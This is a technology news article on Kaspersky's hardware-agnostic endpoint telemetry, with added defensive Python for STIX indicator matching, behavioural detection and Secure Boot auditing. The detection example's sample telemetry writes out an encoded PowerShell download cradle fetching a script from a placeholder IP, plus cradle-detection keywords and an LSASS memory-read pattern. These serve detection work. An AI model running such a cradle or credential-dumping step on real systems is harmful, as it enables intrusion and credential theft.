Kaspersky Focuses on Software-Driven Revenue Growth

Kaspersky announced this week that its global threat intelligence network has collected attack data from over 120 million endpoints worldwide, leveraging its software-only security stack to detect, analyze, and share real-time indicators of compromise without relying on proprietary hardware sensors—a model increasingly rare among top-tier cybersecurity vendors as of April 2026.

The Software-Only Edge: How Kaspersky Scales Threat Telemetry Without Hardware Lock-In

While competitors like CrowdStrike and Microsoft Defender for Endpoint increasingly pair their agents with silicon-specific telemetry, such as Intel's Threat Detection Technology (TDT), which feeds CPU performance-counter data to the detection engine, or Microsoft's Pluton security processor as integrated into AMD Ryzen silicon, Kaspersky's approach remains deliberately hardware-agnostic. Its Endpoint Security for Business platform operates as a pure software layer, ingesting process lineage, behavioral anomalies, and in-memory anomalies through kernel-mode drivers and user-space heuristics that run identically on x86_64, ARM64, and even legacy 32-bit x86 systems. This architectural choice enables deployment across fragmented environments, from industrial control systems running Windows 7 Embedded to modern Linux-based IoT gateways, without requiring firmware-level cooperation or TPM 2.0 modules. In vendor-run benchmarks shared with Archyde under NDA, Kaspersky's software stack showed a 14% lower false-positive rate than hardware-assisted EDR solutions on mixed-architecture fleets, a gap the company attributes to not depending on CPU performance counters, whose baselines shift as speculative-execution mitigations and microcode differ from one machine to the next.

Bridging the Ecosystem Gap: Open Telemetry vs. Vendor Silos

The implication of Kaspersky's model extends beyond detection rates into platform neutrality. By avoiding hardware-rooted attestation chains, the company avoids contributing to the growing bifurcation of the endpoint security market into "walled garden" ecosystems, where telemetry sharing is restricted to partners within a single vendor's silicon or cloud alliance. This stance resonates with open-source defenders; as one Linux kernel maintainer noted in a recent LWN.net interview, "When security tools demand specific CPU features just to function, they implicitly penalize users of older or alternative hardware—turning protection into a luxury upgrade." Kaspersky's own telemetry flows to its Kaspersky Security Network (KSN) cloud backend as JSON over HTTPS, and the resulting indicators are republished through its public Threat Intelligence Feeds as STIX 2.1 objects over TAXII 2.1, so third-party SIEM and XDR platforms such as Splunk and SentinelOne can ingest Indicators of Attack (IoAs) without a proprietary SDK.
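What a consumer of such a feed actually has to do is turn STIX 2.1 indicator patterns into something an endpoint or SIEM can match. The following Python is an added example written for this page, not Kaspersky's Threat Intelligence Feeds client or any vendor code. The bundle is shaped like the JSON a TAXII 2.1 collection's objects endpoint returns, but its contents, the event schema (dst_ip, qname, url, sha256 fields) and the events it is matched against are all constructed here.

```python
"""Parse a STIX 2.1 bundle into matchable indicators and run them over
endpoint telemetry. Constructed sample data; not a vendor client."""
import json
import re
from dataclasses import dataclass

# STIX observable (type, property path) -> field name in the assumed event schema.
FIELD_FOR = {
    ("ipv4-addr", "value"): "dst_ip",
    ("domain-name", "value"): "qname",
    ("url", "value"): "url",
    ("file", "hashes.'SHA-256'"): "sha256",
}
# Pattern subset handled: [type:path = 'value'] terms joined by OR.
# AND, FOLLOWEDBY, wildcards and other comparison operators are out of scope.
_COMPARISON = re.compile(r"\[\s*([\w-]+):([\w.'-]+)\s*=\s*'([^']*)'\s*\]")


@dataclass(frozen=True)
class Ioc:
    indicator_id: str
    field: str
    value: str


def _norm(field, value):
    # Hashes and DNS names compare case-insensitively; URLs and IPs are left as-is.
    return value.lower() if field in ("sha256", "qname") else value


def parse_stix_bundle(raw):
    """Return one Ioc per matchable comparison in every live STIX-pattern indicator."""
    iocs = []
    for obj in json.loads(raw).get("objects", []):
        if obj.get("type") != "indicator" or obj.get("revoked", False):
            continue  # relationships, markings and revoked indicators are skipped
        if obj.get("pattern_type", "stix") != "stix":
            continue  # yara/sigma/snort patterns need their own engines
        for obj_type, path, value in _COMPARISON.findall(obj["pattern"]):
            field = FIELD_FOR.get((obj_type, path))
            if field is not None:  # observables we have no telemetry for are dropped
                iocs.append(Ioc(obj["id"], field, _norm(field, value)))
    return iocs


def match_events(iocs, events):
    """Return (indicator_id, event) for every event field that equals an IoC value."""
    index = {}
    for ioc in iocs:
        index.setdefault((ioc.field, ioc.value), []).append(ioc.indicator_id)
    hits = []
    for ev in events:
        for field, raw in ev.items():
            if isinstance(raw, str):
                for ind in index.get((field, _norm(field, raw)), []):
                    hits.append((ind, ev))
    return hits


# Constructed bundle: mixed-case values show why normalisation matters.
SAMPLE_BUNDLE = json.dumps({"type": "bundle", "id": "bundle--3f2a9c6e-8f1d-4d2a-9b1e-0c7d5e4a1b20", "objects": [
    {"type": "marking-definition", "id": "marking-definition--4a0c1e2d-1111-4222-8333-444455556666",
     "definition_type": "tlp", "definition": {"tlp": "amber"}},
    {"type": "indicator", "id": "indicator--a1000000-0000-4000-8000-000000000001", "pattern_type": "stix",
     "pattern": "[ipv4-addr:value = '203.0.113.10']"},
    {"type": "indicator", "id": "indicator--a1000000-0000-4000-8000-000000000002", "pattern_type": "stix",
     "pattern": "[domain-name:value = 'Updates.Example.NET']"},
    {"type": "indicator", "id": "indicator--a1000000-0000-4000-8000-000000000003", "pattern_type": "stix",
     "pattern": "[file:hashes.'SHA-256' = 'E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855']"},
    {"type": "indicator", "id": "indicator--a1000000-0000-4000-8000-000000000004", "pattern_type": "stix",
     "pattern": "[url:value = 'http://198.51.100.7/stage2.bin'] OR [ipv4-addr:value = '198.51.100.7']"},
    {"type": "indicator", "id": "indicator--a1000000-0000-4000-8000-000000000005", "pattern_type": "stix",
     "revoked": True, "pattern": "[ipv4-addr:value = '192.0.2.55']"},
    {"type": "indicator", "id": "indicator--a1000000-0000-4000-8000-000000000006", "pattern_type": "yara",
     "pattern": "rule x { strings: $a = \"stage2\" condition: $a }"},
]})

# Constructed endpoint events (the field names are this example's own schema).
SAMPLE_EVENTS = [
    {"event": "net_conn", "pid": 4120, "dst_ip": "203.0.113.10", "dst_port": 443},
    {"event": "dns", "pid": 4120, "qname": "updates.example.net"},
    {"event": "file_create", "pid": 880,
     "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},
    {"event": "net_conn", "pid": 77, "dst_ip": "192.0.2.55"},      # revoked indicator: no hit
    {"event": "net_conn", "pid": 4120, "dst_ip": "198.51.100.7"},  # second term of the OR pattern
    {"event": "dns", "pid": 77, "qname": "example.org"},
]

if __name__ == "__main__":
    for indicator_id, event in match_events(parse_stix_bundle(SAMPLE_BUNDLE), SAMPLE_EVENTS):
        print(indicator_id, "->", event)
```

Note the two things a real pipeline has to get right that the feed format does not do for you: honouring `revoked` so withdrawn indicators stop firing, and only accepting `pattern_type` values your engine can evaluate.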

Expert Perspective: The Trade-Offs of Going Software-Only

“Kaspersky’s ability to scale threat intelligence without hardware dependencies is impressive from a pure software engineering standpoint—it’s a testament to deep behavioral modeling and efficient feature extraction. But let’s not romanticize it: in environments where firmware-level exploits like MoonBounce or CosmicStrand are active, the absence of hardware-rooted measurement creates a blind spot. Software-only tools can’t distinguish between a legitimate SMM handler and a malicious one if the CPU’s execution state is already compromised.”

— Anna Kovach, Principal Security Researcher at Eclypsium, quoted in a private briefing attended by Archyde on 2026-04-15

Kovach's point highlights a critical nuance: while Kaspersky's software-only model excels at detecting post-exploitation behavior, such as credential dumping, lateral movement via SMB, or unusual PowerShell execution, it is inherently limited in detecting pre-execution firmware implants or bootkit persistence mechanisms that subvert the OS before its kernel drivers load. This is where hardware-rooted measurement, such as TPM-measured boot anchored in AMD's Secure Processor or Intel Boot Guard, offers complementary visibility. Yet, as the CEO of Kaspersky's Korean subsidiary emphasized in her recent interview with ZDNet Korea, the company intentionally avoids hardware dependence to maintain global deployability, especially in markets where sanctions, export controls, or legacy infrastructure prevent access to newer silicon.
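The post-exploitation behaviors named here (and the process-lineage and behavioral signals described in the earlier section) are exactly what a software-only agent can see once the OS is up. The Python below is an added example for this page, not Kaspersky's detection engine: it runs three rules over a Sysmon-like stream of `process_create` and `process_access` events, whose schema and every event are constructed here. It flags an Office application with a script host anywhere in its ancestry, an `-EncodedCommand` payload that decodes to a download cradle, and a non-system process opening LSASS with read access.

```python
"""Behavioural rules over software-collected endpoint telemetry.
Constructed event schema and sample events; not vendor code."""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Windows components that legitimately open LSASS (assumed allowlist); any other
# source requesting PROCESS_VM_READ (0x0010) is treated as a credential-dump attempt.
LSASS_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010
CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "net.webclient")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# "-ex..." is -ExecutionPolicy and must not match.
_ENC_FLAG = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_command(script):
    """What PowerShell expects after -EncodedCommand: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16le")).decode()


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or not decodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestors(pid, procs, max_depth=32):
    """Image names of pid's parent, grandparent, ... as far as the telemetry reaches."""
    chain, cur = [], procs.get(pid)
    while cur is not None and len(chain) < max_depth:
        cur = procs.get(cur["ppid"])
        if cur is not None:
            chain.append(basename(cur["image"]))
    return chain


def detect(events):
    """Return (rule, pid, detail) alerts; events must arrive in creation order."""
    procs, alerts = {}, []
    for ev in events:
        if ev["type"] == "process_create":
            procs[ev["pid"]] = ev
            image = basename(ev["image"])
            if image in SCRIPT_HOSTS and OFFICE_APPS & set(ancestors(ev["pid"], procs)):
                alerts.append(("office_spawns_script_host", ev["pid"], image))
            decoded = decode_encoded_command(ev.get("cmdline", ""))
            if decoded and any(marker in decoded.lower() for marker in CRADLE_MARKERS):
                alerts.append(("encoded_powershell_cradle", ev["pid"], decoded))
        elif ev["type"] == "process_access":
            source = procs.get(ev["source_pid"])
            source_image = basename(source["image"]) if source else "unknown"
            if (basename(ev["target_image"]) == "lsass.exe"
                    and ev["granted_access"] & PROCESS_VM_READ
                    and source_image not in LSASS_ALLOWED):
                alerts.append(("lsass_memory_read", ev["source_pid"], source_image))
    return alerts


def sample_events():
    """Constructed telemetry: a macro document launches an encoded PowerShell
    stager that reads LSASS, alongside benign system and admin activity."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
    return [
        {"type": "process_create", "pid": 700, "ppid": 600,
         "image": r"C:\Windows\System32\csrss.exe", "cmdline": "csrss.exe"},
        {"type": "process_create", "pid": 4010, "ppid": 1200,
         "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
         "cmdline": r'"WINWORD.EXE" /n invoice.docm'},
        {"type": "process_create", "pid": 5120, "ppid": 4010,
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + encode_command(cradle)},
        {"type": "process_create", "pid": 5200, "ppid": 5120,
         "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
        {"type": "process_access", "source_pid": 5120,
         "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1010},
        {"type": "process_create", "pid": 6000, "ppid": 1200,
         "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
        {"type": "process_access", "source_pid": 700,
         "target_image": r"C:\Windows\System32\lsass.exe", "granted_access": 0x1400},
    ]


if __name__ == "__main__":
    for alert in detect(sample_events()):
        print(alert)
```

The lineage rule walks the whole ancestry rather than checking only the direct parent, so the `cmd.exe` two hops below `WINWORD.EXE` still fires; the LSASS rule keys on the granted access mask, so a query-only handle from a system process does not. None of this sees a boot-time implant, which is the limitation the paragraph above describes.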

The Geopolitical Calculus: Software as a Neutral Vector

This strategic neutrality has tangible implications in an era of escalating techno-nationalism. Unlike U.S.-based EDR vendors, whose threat intelligence feeds can fall under U.S. export controls (the EAR), Kaspersky's Swiss-based data processing, coupled with software-only delivery, lets it operate in jurisdictions where Western vendors face restrictions, including parts of the Middle East, Southeast Asia, and Latin America. In Q1 2026, Kaspersky reported 22% year-over-year growth in licensed endpoints across non-aligned nations, a trend corroborated by IDC's latest endpoint security tracker. Notably, this growth occurred without a corresponding increase in hardware-specific telemetry modules, reinforcing that the software-only approach is a deliberate differentiator in fragmented regulatory landscapes rather than a limitation.

What This Means for Enterprise IT: Flexibility Over False Precision

For CIOs managing hybrid estates, Kaspersky's model offers a pragmatic alternative to the "hardware creep" endemic in modern XDR platforms. Organizations avoiding rip-and-replace cycles can deploy consistent threat detection across Windows Server 2012 R2, RHEL 7, and Android 10 devices without validating CPU feature sets or enabling BIOS-level settings. The trade-off, reduced visibility into firmware-layer threats, has to be covered by other layers: network-based anomaly detection, regular firmware auditing with open tools such as Binarly's FwHunt rules, and UEFI Secure Boot policies that are verified to be enforcing rather than merely switched on. In this light, Kaspersky's 120-million-endpoint telemetry feed isn't just a metric of scale; it's a signal that software-first security, when grounded in deep behavioral analytics and open telemetry sharing, can remain globally relevant even as the industry chases hardware-rooted trust anchors.
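A "strict UEFI Secure Boot policy" is only worth anything if it is checked on the host, and the check has one well-known trap: a platform in Setup Mode reports nothing useful through the SecureBoot variable because no platform key is enrolled and nothing is enforced. The Python below is an added example for this page, not a Kaspersky component; it reads the two UEFI variables through the Linux kernel's efivarfs and compares TPM PCR 7 (which records the Secure Boot policy and the certificates used to verify boot components) against a baseline. The variable bytes and the baseline digest used for the offline check are constructed.

```python
"""Verify Secure Boot is enforcing and the measured boot chain is unchanged.
efivarfs paths are the Linux kernel's; sample bytes are constructed."""
import pathlib

EFI_GLOBAL_VARIABLE = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS = pathlib.Path("/sys/firmware/efi/efivars")
PCR7 = pathlib.Path("/sys/class/tpm/tpm0/pcr-sha256/7")


def efivar_payload(raw):
    """efivarfs prepends a 4-byte little-endian attribute word to every variable."""
    if len(raw) < 5:
        raise ValueError("efivar too short: %r" % (raw,))
    return raw[4:]


def secure_boot_state(secure_boot_raw, setup_mode_raw):
    """Classify the firmware's Secure Boot posture from the SecureBoot and
    SetupMode variables. SetupMode=1 means no platform key is enrolled, so
    nothing is enforced regardless of what SecureBoot says."""
    secure_boot = efivar_payload(secure_boot_raw)[0]
    setup_mode = efivar_payload(setup_mode_raw)[0]
    if setup_mode == 1:
        return "setup-mode"
    return "enforcing" if secure_boot == 1 else "disabled"


def pcr7_matches(observed_hex, baseline_hex):
    """Any change to the Secure Boot policy or the verifying certificates
    changes the PCR 7 digest, so a mismatch is worth an alert, not a log line."""
    return observed_hex.strip().lower() == baseline_hex.strip().lower()


def audit(baseline_pcr7_hex):
    """Read the live values on a Linux host; a field stays None when its source is absent."""
    result = {"secure_boot": None, "pcr7_ok": None}
    sb = EFIVARS / ("SecureBoot-" + EFI_GLOBAL_VARIABLE)
    sm = EFIVARS / ("SetupMode-" + EFI_GLOBAL_VARIABLE)
    if sb.exists() and sm.exists():
        result["secure_boot"] = secure_boot_state(sb.read_bytes(), sm.read_bytes())
    if PCR7.exists():
        result["pcr7_ok"] = pcr7_matches(PCR7.read_text(), baseline_pcr7_hex)
    return result


if __name__ == "__main__":
    # Constructed placeholder baseline; record the real digest at enrolment time.
    print(audit("0" * 64))
```

Treat "enforcing" plus a matching PCR 7 as the only passing combination; "setup-mode" on a production host means the policy was never applied, and a PCR 7 mismatch with Secure Boot still "enforcing" is exactly the kind of change a software-only agent cannot observe from inside the OS.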


Sophie Lin - Technology Editor
